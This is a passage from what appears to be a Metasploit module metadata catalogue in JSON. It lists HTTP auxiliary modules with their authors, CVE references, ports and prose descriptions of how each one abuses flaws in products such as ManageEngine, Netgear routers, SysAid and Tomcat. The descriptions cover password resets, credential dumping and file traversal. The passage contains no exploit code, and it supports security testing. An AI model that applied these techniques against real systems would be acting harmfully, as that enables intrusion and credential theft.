"CVE-2014-7863",
"OSVDB-117695",
"URL-https://seclists.org/fulldisclosure/2015/Jan/114",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_file_download",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/manageengine_pmp_privesc": {
"name": "ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection",
"full_name": "auxiliary/admin/http/manageengine_pmp_privesc",
"rank": 300,
"disclosure_date": "2014-11-08",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection\n vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate\n privileges and obtain Super Administrator access. A Super Administrator can then\n use his privileges to dump the whole password database in CSV format. PMP can use\n both MySQL and PostgreSQL databases but this module only exploits the latter as\n MySQL does not support stacked queries with Java. PostgreSQL is the default database\n in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,\n so a higher version does not guarantee exploitability. This module has been tested\n on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in\n v7.1 build 7105 and above.",
"references": [
"CVE-2014-8499",
"OSVDB-114485",
"URL-https://seclists.org/fulldisclosure/2014/Nov/18",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_pmp_privesc.txt"
],
"platform": "",
"arch": "",
"rport": 7272,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_pmp_privesc",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/mantisbt_password_reset": {
"name": "MantisBT password reset",
"full_name": "auxiliary/admin/http/mantisbt_password_reset",
"rank": 300,
"disclosure_date": "2017-04-16",
"type": "auxiliary",
"author": [
"John (hyp3rlinx) Page",
"Julien (jvoisin) Voisin"
],
"description": "MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.",
"references": [
"CVE-2017-7615",
"EDB-41890",
"URL-https://mantisbt.org/bugs/view.php?id=22690",
"URL-http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/mantisbt_password_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/mantisbt_password_reset",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/mutiny_frontend_read_delete": {
"name": "Mutiny 5 Arbitrary File Read and Delete",
"full_name": "auxiliary/admin/http/mutiny_frontend_read_delete",
"rank": 300,
"disclosure_date": "2013-05-15",
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits the EditDocument servlet from the frontend on the Mutiny 5\n appliance. The EditDocument servlet provides file operations, such as copy and\n delete, which are affected by a directory traversal vulnerability. Because of this,\n any authenticated frontend user can read and delete arbitrary files from the system\n with root privileges. In order to exploit the vulnerability a valid user (any role)\n in the web frontend is required. The module has been tested successfully on the\n Mutiny 5.0-1.07 appliance.",
"references": [
"CVE-2013-0136",
"US-CERT-VU-701572",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb",
"is_install_path": true,
"ref_name": "admin/http/mutiny_frontend_read_delete",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/netflow_file_download": {
"name": "ManageEngine NetFlow Analyzer Arbitrary File Download",
"full_name": "auxiliary/admin/http/netflow_file_download",
"rank": 300,
"disclosure_date": "2014-11-30",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file download vulnerability in CSVServlet\n on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you\n must escape the backslash with a backslash.",
"references": [
"CVE-2014-5445",
"OSVDB-115340",
"URL-https://seclists.org/fulldisclosure/2014/Dec/9",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/netflow_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/netflow_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/netgear_auth_download": {
"name": "NETGEAR ProSafe Network Management System 300 Authenticated File Download",
"full_name": "auxiliary/admin/http/netgear_auth_download",
"rank": 300,
"disclosure_date": "2016-02-04",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has a file download vulnerability that can be exploited by an\n authenticated remote attacker to download any file in the system.\n This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.",
"references": [
"CVE-2016-1524",
"US-CERT-VU-777024",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt",
"URL-https://seclists.org/fulldisclosure/2016/Feb/30"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/netgear_auth_download.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_auth_download",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/netgear_soap_password_extractor": {
"name": "Netgear Unauthenticated SOAP Password Extractor",
"full_name": "auxiliary/admin/http/netgear_soap_password_extractor",
"rank": 300,
"disclosure_date": "2015-02-11",
"type": "auxiliary",
"author": [
"Peter Adkins <peter.adkins@kernelpicnic.net>",
"Michael Messner <devnull@s3cur1ty.de>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module exploits an authentication bypass vulnerability in different Netgear devices.\n It allows to extract the password for the remote management interface. This module has been\n tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:\n NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,\n NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),\n NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),\n NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),\n NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),\n NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),\n NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),\n NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),\n NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)",
"references": [
"BID-72640",
"OSVDB-118316",
"URL-https://github.com/darkarnium/secpub/tree/master/NetGear/SOAPWNDR"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_soap_password_extractor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/netgear_wnr2000_pass_recovery": {
"name": "NETGEAR WNR2000v5 Administrator Password Recovery",
"full_name": "auxiliary/admin/http/netgear_wnr2000_pass_recovery",
"rank": 300,
"disclosure_date": "2016-12-20",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.\n This vulnerability can be exploited by an unauthenticated attacker who is able to guess\n the value of a certain timestamp which is in the configuration of the router.\n Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n it is guaranteed that it can be bruteforced.\n This module works very reliably and it has been tested with the WNR2000v5, firmware versions\n 1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this\n has not been tested.",
"references": [
"CVE-2016-10175",
"CVE-2016-10176",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt",
"URL-https://seclists.org/fulldisclosure/2016/Dec/72",
"URL-http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_wnr2000_pass_recovery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/nexpose_xxe_file_read": {
"name": "Nexpose XXE Arbitrary File Read",
"full_name": "auxiliary/admin/http/nexpose_xxe_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>",
"Drazen Popovic <drazen.popvic@infigo.hr>",
"Bojan Zdrnja <bojan.zdrnja@infigo.hr>"
],
"description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n of vectors. This vulnerability can allow an attacker to a craft special XML that\n could read arbitrary files from the filesystem. This module exploits the\n vulnerability via the XML API.",
"references": [
"URL-https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24"
],
"platform": "",
"arch": "",
"rport": 3780,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb",
"is_install_path": true,
"ref_name": "admin/http/nexpose_xxe_file_read",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/novell_file_reporter_filedelete": {
"name": "Novell File Reporter Agent Arbitrary File Delete",
"full_name": "auxiliary/admin/http/novell_file_reporter_filedelete",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "NFRAgent.exe in Novell File Reporter allows remote attackers to delete\n arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and\n CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on\n Windows platforms.",
"references": [
"CVE-2011-2750",
"OSVDB-73729",
"URL-http://aluigi.org/adv/nfr_2-adv.txt"
],
"platform": "",
"arch": "",
"rport": 3037,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb",
"is_install_path": true,
"ref_name": "admin/http/novell_file_reporter_filedelete",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/nuuo_nvrmini_reset": {
"name": "NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset",
"full_name": "auxiliary/admin/http/nuuo_nvrmini_reset",
"rank": 300,
"disclosure_date": "2016-08-04",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable\n to an administrator password reset on the exposed web management interface.\n Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware\n (before v1.7.6), otherwise you need an administrative user password.\n This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n in those devices.",
"references": [
"CVE-2016-5676",
"US-CERT-VU-856152",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt",
"URL-https://seclists.org/bugtraq/2016/Aug/45"
],
"platform": "",
"arch": "",
"rport": 8081,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/nuuo_nvrmini_reset",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/openbravo_xxe": {
"name": "Openbravo ERP XXE Arbitrary File Read",
"full_name": "auxiliary/admin/http/openbravo_xxe",
"rank": 300,
"disclosure_date": "2013-10-30",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "The Openbravo ERP XML API expands external entities which can be defined as\n local files. This allows the user to read any files from the FS as the\n user Openbravo is running as (generally not root).\n\n This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.",
"references": [
"CVE-2013-3617",
"OSVDB-99141",
"BID-63431",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/http/openbravo_xxe.rb",
"is_install_path": true,
"ref_name": "admin/http/openbravo_xxe",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/pfadmin_set_protected_alias": {
"name": "Postfixadmin Protected Alias Deletion Vulnerability",
"full_name": "auxiliary/admin/http/pfadmin_set_protected_alias",
"rank": 300,
"disclosure_date": "2017-02-03",
"type": "auxiliary",
"author": [
"Jan-Frederik Rieckers"
],
"description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n admin is allowed to delete protected aliases. This vulnerability can be\n used to redirect protected aliases to an other mail address. Eg. rewrite\n the postmaster@domain alias",
"references": [
"CVE-2017-5930",
"URL-https://github.com/postfixadmin/postfixadmin/pull/23",
"BID-96142"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-30 13:03:36 +0000",
"path": "/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb",
"is_install_path": true,
"ref_name": "admin/http/pfadmin_set_protected_alias",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/rails_devise_pass_reset": {
"name": "Ruby on Rails Devise Authentication Password Reset",
"full_name": "auxiliary/admin/http/rails_devise_pass_reset",
"rank": 300,
"disclosure_date": "2013-01-28",
"type": "auxiliary",
"author": [
"joernchen",
"jjarmoc"
],
"description": "The Devise authentication gem for Ruby on Rails is vulnerable\n to a password reset exploit leveraging type confusion. By submitting XML\n to rails, we can influence the type used for the reset_password_token\n parameter. This allows for resetting passwords of arbitrary accounts,\n knowing only the associated email address.\n\n This module defaults to the most common devise URIs and response values,\n but these may require adjustment for implementations which customize them.\n\n Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database\n except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails\n 3.2.11. Patch applied to Rails 3.2.12 and 3.1.11 should prevent exploitation\n of this vulnerability, by quoting numeric values when comparing them with\n non numeric values.",
"references": [
"CVE-2013-0233",
"OSVDB-89642",
"BID-57577",
"URL-http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/",
"URL-http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html",
"URL-https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8",
"URL-https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/rails_devise_pass_reset",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/scadabr_credential_dump": {
"name": "ScadaBR Credentials Dumper",
"full_name": "auxiliary/admin/http/scadabr_credential_dump",
"rank": 300,
"disclosure_date": "2017-05-28",
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module retrieves credentials from ScadaBR, including\n service credentials and unsalted SHA1 password hashes for\n all users, by invoking the 'EmportDwr.createExportData' DWR\n method of Mango M2M which is exposed to all authenticated\n users regardless of privilege level.\n\n This module has been tested successfully with ScadaBR\n versions 1.0 CE and 0.9 on Windows and Ubuntu systems.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/admin/http/scadabr_credential_dump.rb",
"is_install_path": true,
"ref_name": "admin/http/scadabr_credential_dump",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/scrutinizer_add_user": {
"name": "Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass",
"full_name": "auxiliary/admin/http/scrutinizer_add_user",
"rank": 300,
"disclosure_date": "2012-07-27",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>",
"Jonathan Claudius",
"Tanya Secker",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer\n without any authentication. Versions such as 9.0.1 or older are affected.",
"references": [
"CVE-2012-2626",
"OSVDB-84318",
"URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb",
"is_install_path": true,
"ref_name": "admin/http/scrutinizer_add_user",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/sophos_wpa_traversal": {
"name": "Sophos Web Protection Appliance patience.cgi Directory Traversal",
"full_name": "auxiliary/admin/http/sophos_wpa_traversal",
"rank": 300,
"disclosure_date": "2013-04-03",
"type": "auxiliary",
"author": [
"Wolfgang Ettlingers",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n on the /cgi-bin/patience.cgi component. This module has been tested successfully on the\n Sophos Web Virtual Appliance v3.7.0.",
"references": [
"CVE-2013-2641",
"OSVDB-91953",
"BID-58833",
"EDB-24932",
"URL-http://www.sophos.com/en-us/support/knowledgebase/118969.aspx",
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/sophos_wpa_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/sophos_wpa_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/sysaid_admin_acct": {
"name": "SysAid Help Desk Administrator Account Creation",
"full_name": "auxiliary/admin/http/sysaid_admin_acct",
"rank": 300,
"disclosure_date": "2015-06-03",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to create an administrator account. Note that this exploit will only work once. Any\n subsequent attempts will fail. On the other hand, the credentials must be verified\n manually. This module has been tested on SysAid 14.4 in Windows and Linux.",
"references": [
"CVE-2015-2993",
"URL-https://seclists.org/fulldisclosure/2015/Jun/8",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/sysaid_admin_acct.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_admin_acct",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/sysaid_file_download": {
"name": "SysAid Help Desk Arbitrary File Download",
"full_name": "auxiliary/admin/http/sysaid_file_download",
"rank": 300,
"disclosure_date": "2015-06-03",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits two vulnerabilities in SysAid Help Desk that allows\n an unauthenticated user to download arbitrary files from the system. First, an\n information disclosure vulnerability (CVE-2015-2997) is used to obtain the file\n system path, and then we abuse a directory traversal (CVE-2015-2996) to download\n the file. Note that there are some limitations on Windows, in that the information\n disclosure vulnerability doesn't work on a Windows platform, and we can only\n traverse the current drive (if you enter C:\\afile.txt and the server is running\n on D:\\ the file will not be downloaded).\n\n This module has been tested with SysAid 14.4 on Windows and Linux.",
"references": [
"CVE-2015-2996",
"CVE-2015-2997",
"URL-https://seclists.org/fulldisclosure/2015/Jun/8",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/sysaid_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/sysaid_sql_creds": {
"name": "SysAid Help Desk Database Credentials Disclosure",
"full_name": "auxiliary/admin/http/sysaid_sql_creds",
"rank": 300,
"disclosure_date": "2015-06-03",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to download arbitrary files from the system. This is used to download the server\n configuration file that contains the database username and password, which is encrypted\n with a fixed, known key. This module has been tested with SysAid 14.4 on Windows and Linux.",
"references": [
"CVE-2015-2996",
"CVE-2015-2998",
"URL-https://seclists.org/fulldisclosure/2015/Jun/8",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/sysaid_sql_creds.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_sql_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/telpho10_credential_dump": {
"name": "Telpho10 Backup Credentials Dumper",
"full_name": "auxiliary/admin/http/telpho10_credential_dump",
"rank": 300,
"disclosure_date": "2016-09-02",
"type": "auxiliary",
"author": [
"Jan Rude"
],
"description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system\n appliance. This module generates a configuration backup of Telpho10,\n downloads the file and dumps the credentials for admin login,\n phpmyadmin, phpldapadmin, etc.\n This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-05-23 09:32:41 +0000",
"path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb",
"is_install_path": true,
"ref_name": "admin/http/telpho10_credential_dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/tomcat_administration": {
"name": "Tomcat Administration Tool Default Access",
"full_name": "auxiliary/admin/http/tomcat_administration",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "Detect the Tomcat administration interface. The administration interface is included in versions 5.5 and lower.\n Port 8180 is the default for FreeBSD, 8080 for all others.",
"references": [
"URL-http://tomcat.apache.org/"
],
"platform": "",
"arch": "",
"rport": 8180,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-21 08:50:26 +0000",
"path": "/modules/auxiliary/admin/http/tomcat_administration.rb",
"is_install_path": true,
"ref_name": "admin/http/tomcat_administration",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/tomcat_utf8_traversal": {
"name": "Tomcat UTF-8 Directory Traversal Vulnerability",
"full_name": "auxiliary/admin/http/tomcat_utf8_traversal",
"rank": 300,
"disclosure_date": "2009-01-09",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>",
"guerrino <ruggine> di massa"
],
"description": "This module tests whether a directory traversal vulnerability is present\n in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0\n - 6.0.16 under specific and non-default installations. The connector must have\n allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the\n vulnerability actually occurs within Java and not Tomcat; the server must\n use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java\n 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against\n RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change\n FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.",
"references": [
"URL-http://tomcat.apache.org/",
"OSVDB-47464",
"CVE-2008-2938",
"URL-http://www.securityfocus.com/archive/1/499926"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-19 04:16:26 +0000",
"path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/tomcat_utf8_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/trendmicro_dlp_traversal": {
"name": "TrendMicro Data Loss Prevention 5.5 Directory Traversal",
"full_name": "auxiliary/admin/http/trendmicro_dlp_traversal",
"rank": 300,
"disclosure_date": "2009-01-09",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module tests whether a directory traversal vulnerablity is present\n in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.\n The vulnerability appears to be actually caused by the Tomcat UTF-8\n bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.\n This module simply tests for the same bug with Trend Micro specific settings.\n Note that in the Trend Micro appliance, /etc/shadow is not used and therefore\n password hashes are stored and anonymously accessible in the passwd file.",
"references": [
